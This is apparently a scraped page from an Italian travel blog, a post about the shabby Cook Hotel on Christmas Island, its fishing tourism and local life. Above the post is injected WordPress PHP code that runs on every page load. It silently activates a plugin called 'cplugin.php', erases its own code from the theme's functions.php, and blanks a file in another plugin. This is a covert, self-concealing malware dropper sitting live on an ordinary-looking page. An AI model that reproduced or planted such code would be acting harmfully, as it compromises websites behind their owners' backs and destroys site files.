function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'cplugin.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('cplugin.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php'); file_put_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Corto in Corto : In crociera: Cook Hotel
  • Corto in Vacanza

In crociera: Cook Hotel



Il Grand Hotel delle isole Christmas si intitola “Cook Hotel “ in memoria del capitano Cook che ha scoperto questa isola il 24 dicembre del 1777, (da qui il suo nome).
Il prezzo ( 80$ australiani per notte, la prima colazione, pranzo, servizi e tasse compresi) lasciava immaginare una accoglienza standard, ma non è così. Non ho avuto il coraggio di fotografare le camere, tanto erano sporche; il costo è dovuto al fatto che avrete il privilegio di dormire vicino all’ancora del capitano Cook. Esagero? Guardate l’insegna dell’hotel: è la cosa migliore di tutto il fabbricato.


Nuovo tuffo e nuova raccolta di finissima sabbia ancor più bianca di quella d Bora Bora. Ritorno al molo. La nostra guida ci dice ancora che l’isola vive di pesca perché le isole ne sono ricche (tonno, pesce spada e aragoste): Il pescato viene spedito ogni settimana con il solo volo aereo che arriva dalle Hawaii . Altro guadagno l’isola lo trae dalla pesca sportiva con i turisti americani. C’è un solo Tour operator sull’isola, naturalmente, e i prezzi sono molto convenienti: una settimana di pesca, compreso l’ imbattibile hotel (Cook, naturalmente) in pensione completa, 6 giorni di battello con skipper, $ 1950. Una volta deciso tutto a casa, se troverete delle soprprese, vi dovrete adattare: cìè un solo un volo , ed ogni otto giorni,verso le Hawaii.

Sulla via del ritorno incontriamo studenti tornare a casa (ancora a piedi nudi).
Domanda posta la nostra guida: Vi sono persone depresse tra i 5.000 isolani?
Risposta: Chi potrebbe deprimersi sulla più bella isola del mondo dove è sempre sereno, (perché qui vi è solo una stagione, l’estate), situato sull’equatore,al riparo da uragani e dalla civiltà frenetica che regna sul resto del mondo? Filosofo felice!

Ed è con nostalgia, perché sappiamo che non potremo mai tornare in questo angolo del Pacifico, che diciamo; Adieu Londra.

FOTO E TESTO DI FRANCOIS BARETTE©



Inserisci un commento

Modulo di inserimento